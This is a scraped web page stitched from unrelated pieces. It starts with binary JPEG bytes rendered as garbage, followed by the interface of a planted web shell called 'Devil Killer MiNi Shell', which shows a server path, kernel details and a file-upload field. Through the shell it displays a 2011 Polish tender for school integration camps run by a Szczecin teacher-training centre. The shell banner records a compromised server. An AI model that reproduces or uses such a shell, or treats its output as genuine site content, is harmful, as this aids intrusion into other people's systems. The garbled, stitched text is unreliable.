JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110127/31959-N-2011.html

<p class="kh_header"><b>Szczecin: Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła
 w ramach Projektu Systemowego Atrakcyjna szkoła drogą do sukcesu, realizowanego ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX, Działania 9.1, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych</b><br>
<b>Numer ogłoszenia: 31959 - 2011; data zamieszczenia: 27.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zachodniopomorskie Centrum Doskonalenia Nauczycieli , ul. J. Sowińskiego 68, 70-236 Szczecin, woj. zachodniopomorskie, tel. 091 4350 622, faks 091 422 52 24.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Inny: Samorządowa jednostka budżetowa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług noclegowych, wyżywienia i organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła
 w ramach Projektu Systemowego Atrakcyjna szkoła drogą do sukcesu, realizowanego ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX, Działania 9.1, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie noclegów, wyżywienia dla uczniów i opiekunów oraz organizacja atrakcyjnego przedsięwzięcia dla uczestników 5-dniowych obozów integracyjno-naukowych. Transport uczestników wyjazdów na trasie szkoła-ośrodek-szkoła.

2.	Dokładny opis przedmiotu zamówienia określa pkt 3 rozdziału III. SIWZ.
3.	Zamawiający dopuszcza możliwość składania ofert częściowych wg zadań od 1 do 8. Oznacza to, że wykonawca może złożyć ofertę na jedno, kilka lub wszystkie zadania. W ramach realizacji przedmiotu zamówienia wykonawca zobowiązany będzie do zapewnienia:

Zadanie 1 
- 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 150 uczniów (10 grup 15-osobowych) w pokojach 2-3-4-osobowych z węzłem sanitarnym. W razie konieczności zapewnienie liczby pokojów dającej możliwość separacji chłopców od dziewczynek w przypadku niepodzielności całej liczby uczestników przez 2 lub 3 przy uwzględnieniu kryterium płci.
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 20 nauczycieli w pokojach 1- lub 2-osobowych z pełnym węzłem sanitarnym.
 - Wyżywienie 150 uczniów (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Wyżywienie 20 nauczycieli (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Zapewnienie atrakcji kulturalno-rozrywkowej dla każdej z grup (ognisko, grill, zabawa z dodatkowym poczęstunkiem, animacja zajęć ).
 - Udostępnienie sali warsztatowej z dostępem do rzutnika, flipchartem - 6 godzin dziennie dla każdej grupy językowej (5 grup). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali komputerowej z 10-15 komputerami dla uczniów plus komputer dla prowadzącego na 6 godzin dziennie dla każdej grupy informatycznej (1 grupa). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali gimnastycznej zamiennie z basenem wraz ze sprzętem sportowym (piłki, siatki, znaczniki, magnetofon) na 6 godzin dziennie dla każdej grupy sportowej (4 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Możliwości korzystania z ogrodzonego terenu zielonego na terenie ośrodka.
 - Odbiornika telewizyjnego w każdym pokoju.
 - Monitoringu obiektu obejmującego co najmniej wszystkie wejścia do budynku oraz recepcję (w celu zapewnienia większego bezpieczeństwa dzieci).
 - Zabezpieczenie nieodpłatnie jednego miejsca noclegowego wraz z wyżywieniem dla osoby wizytującej obóz przez cały okres jego trwania.
 - Zakwaterowanie 150 uczniów oraz 20 opiekunów w czasie od 14 lutego 2011 roku do 18 lutego 2011 roku.
 - Transport uczniów wraz z opiekunami na trasie szkoła-ośrodek-szkoła
 - transport uczniów wraz z opiekunami ze szkoły w Brojcach (grupa językowa oraz grupa sportowa - 30 uczniów oraz 4 opiekunów);
 - transport uczniów wraz z opiekunami ze szkoły w Karlinie (jedna grupa językowa, jedna sportowa oraz jedna informatyczna 45 uczniów oraz 6 opiekunów)
 - transport uczniów wraz z opiekunami ze szkoły w Gościnie (trzy grupy językowe i 2 grupy sportowe- 75 uczniów 10 opiekunów)

Zadanie 2 
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek)dla 90 uczniów (6 grup 15-osobowych) w pokojach 2-3-4-osobowych z węzłem sanitarnym. W razie konieczności zapewnienie liczby pokojów zapewniającej możliwość separacji chłopców od dziewczynek w przypadku niepodzielności całej liczby uczestników przez 2 lub 3 przy uwzględnieniu krytemu płci.
 - 4 noclegów (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 12 nauczycieli w pokojach 1- lub 2-osobowych z pełnym węzłem sanitarnym.
 - wyżywienia 90 uczniów (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - wyżywienie 12 nauczycieli (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Zapewnienie atrakcji kulturalno-rozrywkowej dla każdej grupy (ognisko, grill, zabawa z dodatkowym poczęstunkiem, animacja zajęć ).
 - Udostępnienie sali komputerowej z 10-15 komputerami dla uczniów plus komputer dla prowadzącego na 6 godzin dziennie dla każdej grupy informatycznej (6 grup). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Możliwości korzystania z ogrodzonego terenu zielonego na terenie ośrodka.
 - Odbiornika telewizyjnego w każdym pokoju.
 - Monitoringu obiektu obejmującego co najmniej wszystkie wejścia do budynku oraz recepcję (w celu zapewnienia większego bezpieczeństwa dzieci).
 - Zabezpieczenie nieodpłatnie jednego miejsca noclegowego (w pokoju jednoosobowym) wraz z wyżywieniem dla osoby wizytującej obóz przez cały okres jego trwania.
 - Zakwaterowanie 90 uczniów oraz 12 opiekunów w czasie od 14 lutego 2011 roku do 18 lutego 2011 roku
 - Transport uczniów wraz z opiekunami na trasie szkoła-ośrodek-szkoła:
 - transport uczniów wraz z opiekunami ze szkoły w Gościnie (trzy grupy informatyczne - 45 uczniów oraz 6 opiekunów);
 - transport uczniów wraz z opiekunami ze szkoły w Brojcach (jedna grupa informatyczna - 15 uczniów oraz 2 opiekunów);
 - transport uczniów wraz z opiekunami ze szkoły w Trzebiatowie (dwie grupy informatyczne - 30 uczniów oraz 2 opiekunów).
Zadanie 3 
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 75 uczniów (5 grup 15-osobowych) w pokojach 2-3-4-osobowych z węzłem sanitarnym. W razie konieczności zapewnienie liczby pokojów zapewniającej możliwość separacji chłopców od dziewczynek w przypadku niepodzielności całej liczby uczestników przez 2 lub 3 przy uwzględnieniu krytemu płci.
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek)dla 10 nauczycieli w pokojach 1- lub 2-osobowych z pełnym węzłem sanitarnym.
 - Wyżywienie 75 uczniów (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Wyżywienie 10 nauczycieli (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Zapewnienie atrakcji kulturalno-rozrywkowej dla każdej grupy z osobna lub wszystkich grup na raz (ognisko, grill, zabawa z dodatkowym poczęstunkiem, animacja zajęć)
 - Udostępnienie co najmniej sali warsztatowej z dostępem do rzutnika, flipchartu - 6 godzin dziennie dla każdej grupy językowej (2 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali gimnastycznej zamiennie z basenem wraz ze sprzętem sportowym (piłki, siatki, znaczniki, magnetofon) na 6 godzin dziennie dla każdej grupy sportowej (2 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali komputerowej z 10-15 komputerami dla uczniów plus komputer dla prowadzącego na 6 godzin dziennie dla każdej grupy informatycznej (1 grupa). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Możliwości korzystania z ogrodzonego terenu zielonego na terenie ośrodka.
 - Odbiornik telewizyjny w każdym pokoju.
 - Monitoringu obiektu obejmujący co najmniej wszystkie wejścia do budynku oraz recepcję (w celu zapewnienia większego bezpieczeństwa dzieci).
 - Zabezpieczenie nieodpłatnie jednego miejsca noclegowego (w pokoju jednoosobowym) wraz z wyżywieniem dla osoby wizytującej obóz przez cały okres jego trwania.
 - Zakwaterowanie 75 uczniów oraz 10 opiekunów w czasie od 14 lutego 2011 roku do 18 lutego 2011 roku.
 - Transport uczniów wraz z opiekunami na trasie szkoła-ośrodek-szkoła
 - transport uczniów wraz z opiekunami ze szkoły w Karlinie (dwie grupy sportowe- 30 uczniów oraz 4 opiekunów);
 - transport uczniów wraz z opiekunami ze szkoły w Trzebiatowie (dwie grupy językowe - 30 uczniów oraz 4 opiekunów);
 - transport uczniów wraz z opiekunami ze szkoły w Barlinku (grupa informatyczna - 15 uczniów oraz 2 opiekunów)
Zadanie 4
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 90 uczniów (6 grup 15-osobowych) w pokojach 2-3-4-osobowych z węzłem sanitarnym. W razie konieczności zapewnienie liczby pokojów zapewniającej możliwość separacji chłopców od dziewczynek w przypadku niepodzielności całej liczby uczestników przez 2 lub 3 przy uwzględnieniu krytemu płci.
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 12 nauczycieli w pokojach 1- lub 2-osobowych z pełnym węzłem sanitarnym.
 - Wyżywienia 90 uczniów (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Wyżywienie 12 nauczycieli (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Zapewnienie atrakcji kulturalno-rozrywkowej dla każdej grupy (ognisko, grill, zabawa z dodatkowym poczęstunkiem, animacja zajęć ).
 - Udostępnienie sali warsztatowej z dostępem do rzutnika, flipchartu - 6 godzin dziennie dla każdej grupy językowej (2 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali komputerowej z 10-15 komputerami dla uczniów plus komputer dla prowadzącego na 6 godzin dziennie dla każdej grupy informatycznej (2 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali gimnastycznej zamiennie z basenem wraz ze sprzętem sportowym (piłki, siatki, znaczniki, magnetofon) na 6 godzin dziennie dla każdej grupy sportowej (2 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Możliwości korzystania z ogrodzonego terenu zielonego na terenie ośrodka.
 - Odbiornik telewizyjny w każdym pokoju.
 - Monitoringu obiektu obejmujący co najmniej wszystkie wejścia do budynku oraz recepcję (w celu zapewnienia większego bezpieczeństwa dzieci).
 - Zabezpieczenie nieodpłatnie jednego miejsca noclegowego (w pokoju jednoosobowym) wraz z wyżywieniem dla osoby wizytującej obóz przez cały okres jego trwania.
 - Zakwaterowanie 90 uczniów oraz 12 opiekunów w czasie od 14 lutego 2011 roku do 18 lutego 2011 roku.
 - Transport uczniów wraz z opiekunami na trasie szkoła-ośrodek-szkoła
 - transport uczniów wraz z opiekunami ze szkoły w Trzebiatowie (dwie grupy sportowe - 30 uczniów oraz 4 opiekunów);
 - transport uczniów ze szkoły w Ińsku (dwie grupy językowe oraz dwie grupy informatyczne- 60 uczniów oraz 8 opiekunów)

Zadanie 5
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 150 uczniów (10 grup 15-osobowych) w pokojach 2-3-4-osobowych z węzłem sanitarnym. W razie konieczności zapewnienie liczby pokojów zapewniającej możliwość separacji chłopców od dziewczynek w przypadku niepodzielności całej liczby uczestników przez 2 lub 3 przy uwzględnieniu kryterium płci.
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 20 nauczycieli w pokojach 1- lub 2-osobowych z pełnym węzłem sanitarnym.
 - Wyżywienia 150 uczniów (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Wyżywienie 20 nauczycieli (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Zapewnienie atrakcji kulturalno-rozrywkowej dla każdej grupy (ognisko, grill, zabawa z dodatkowym poczęstunkiem, animacja zajęć ).
 - Udostępnienie sali warsztatowej z dostępem do rzutnika, flipchartu - 6 godzin dziennie dla każdej grupy językowej (6 grup). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali gimnastycznej zamiennie z basenem wraz ze sprzętem sportowym (piłki, siatki, znaczniki, magnetofon) na 6 godzin dziennie dla każdej grupy sportowej (4 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Możliwości korzystania z ogrodzonego terenu zielonego na terenie ośrodka.
 - Odbiornik telewizyjny w każdym pokoju.
 - Monitoringu obiektu obejmujący co najmniej wszystkie wejścia do budynku oraz recepcję (w celu zapewnienia większego bezpieczeństwa dzieci).
 - Zabezpieczenie nieodpłatnie jednego miejsca noclegowego (w pokoju jednoosobowym) wraz z wyżywieniem dla osoby wizytującej obóz.
 - Zakwaterowanie 150 uczniów oraz 20 opiekunów w czasie od 21 lutego 2011 roku do 25 lutego 2011 roku.
 - Transport uczestników na trasie szkoła-ośrodek-szkoła
 - transport uczniów wraz z opiekunami ze szkoły w Brojcach (grupa sportowa i grupa językowa - 30 uczniów oraz 4 nauczycieli);
 - transport uczniów ze szkoły w Gryficach (trzy grupy sportowe oraz 3 grupy językowe - 90 uczniów oraz 12 nauczycieli).
 - transport uczniów ze szkoły w Karlinie (dwie grupy językowe - 30 uczniów oraz 4 nauczycieli)

Zadanie 6 
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 75 uczniów (5 grup 15-osobowych) w pokojach 2-3-4-osobowych z węzłem sanitarnym. W razie konieczności zapewnienie liczby pokojów zapewniającej możliwość separacji chłopców od dziewczynek w przypadku niepodzielności całej liczby uczestników przez 2 lub 3 przy uwzględnieniu kryterium płci.
 - 4 noclegów (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 10 nauczycieli w pokojach 1- lub 2-osobowych z pełnym węzłem sanitarnym.
 - Wyżywienie 75 uczniów (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Wyżywienie 10 nauczycieli (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Zapewnienie atrakcji kulturalno-rozrywkowej dla każdej grupy (ognisko, grill, zabawa z dodatkowym poczęstunkiem, animacja zajęć ).
 - Udostępnienie sali komputerowej z 10-15 komputerami dla uczniów plus komputer dla prowadzącego na 6 godzin dziennie dla każdej grupy informatycznej (5 grup). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Możliwości korzystania z ogrodzonego terenu zielonego na terenie ośrodka.
 - Odbiornik telewizyjny w każdym pokoju.
 - Monitoring obiektu obejmujący co najmniej wszystkie wejścia do budynku oraz recepcję (w celu zapewnienia większego bezpieczeństwa dzieci.
 - Zabezpieczenie nieodpłatnie jednego miejsca noclegowego w pokoju jednoosobowym wraz z wyżywieniem dla osoby wizytującej obóz.
 - Transport uczestników na trasie szkoła-ośrodek-szkoła
 - transport uczniów wraz z opiekunami ze szkoły w Karlinie (dwie grupy informatyczne - 30 uczniów oraz 4 nauczycieli);
 - transport uczniów ze szkoły w Gryficach (trzy grupy informatyczne - 45 uczniów oraz 6 nauczycieli).

Zadanie 7
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 90 uczniów 6 (grup 15-osobowych) w pokojach 2-3-4-osobowych z węzłem sanitarnym. W razie konieczności zapewnienie liczby pokojów zapewniającej możliwość separacji chłopców od dziewczynek w przypadku niepodzielności całej liczby uczestników przez 2 lub 3 przy uwzględnieniu kryterium płci.
 - 4 noclegów (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 12 nauczycieli w pokojach 1- lub 2-osobowych z pełnym węzłem sanitarnym.
 - Wyżywienie 90 uczniów (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Wyżywienie 12 nauczycieli (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Zapewnienie atrakcji kulturalno-rozrywkowej dla każdej grupy (ognisko, grill, zabawa z dodatkowym poczęstunkiem, animacja zajęć )
 - Udostępnienie sali warsztatowej z dostępem do rzutnika, flipchartu - 6 godzin dziennie dla każdej grupy językowej (2 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali komputerowej z 10-15 komputerami dla uczniów plus komputer dla prowadzącego na 6 godzin dziennie dla każdej grupy informatycznej (2 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Udostępnienie sali gimnastycznej zamiennie z basenem wraz ze sprzętem sportowym (piłki, siatki, znaczniki, magnetofon) na 6 godzin dziennie dla każdej grupy sportowej (2 grupy). Wykonawca zobowiązany jest udostępnić salę we własnym ośrodku lub też w innym miejscu (np. szkole) oddalonym od ośrodka o nie więcej niż 0,5 km a w przypadku większej odległości zobowiązany on jest do zapewnienia transportu dla uczniów i opiekunów, który zostanie wliczony w cenę oferty.
 - Możliwości korzystania z ogrodzonego terenu zielonego na terenie ośrodka.
 - Odbiornik telewizyjny w każdym pokoju.
 - Monitoring obiektu obejmujący co najmniej wszystkie wejścia do budynku oraz recepcję (w celu zapewnienia większego bezpieczeństwa dzieci).
 - Zabezpieczenie nieodpłatnie jednego miejsca noclegowego (w pokoju jednoosobowym) wraz z wyżywieniem dla osoby wizytującej obóz przez cały okres jego trwania.
 - Zakwaterowanie 90 uczniów oraz 12 opiekunów w czasie od 21 lutego 2011 roku do 25 lutego 2011 roku.
 - Transport uczestników na trasie szkoła-ośrodek-szkoła:
 - transport uczniów wraz z opiekunami ze szkoły w Barlinku (dwie grupy sportowe, dwie grupy językowe oraz dwie grupy informatyczne - 90 uczniów oraz 12 nauczycieli).

Zadanie 8
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 60 uczniów (4 grup 15-osobowych) w pokojach 2-3-4-osobowych z węzłem sanitarnym. W razie konieczności zapewnienie liczby pokojów zapewniającej możliwość separacji chłopców od dziewczynek w przypadku niepodzielności całej liczby uczestników przez 2 lub 3 przy uwzględnieniu krytemu płci.
 - 4 noclegi (poniedziałek-wtorek, wtorek-środa, środa-czwartek, czwartek-piątek) dla 8 nauczycieli w pokojach 1- lub 2-osobowych z pełnym węzłem sanitarnym.
 - Wyżywienie 60 uczniów (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
 - Wyżywienie 8 nauczycieli (zapewnienie każdemu 4 śniadań, 5 dwudaniowych obiadów z deserem, 4 podwieczorków, 4 kolacji).
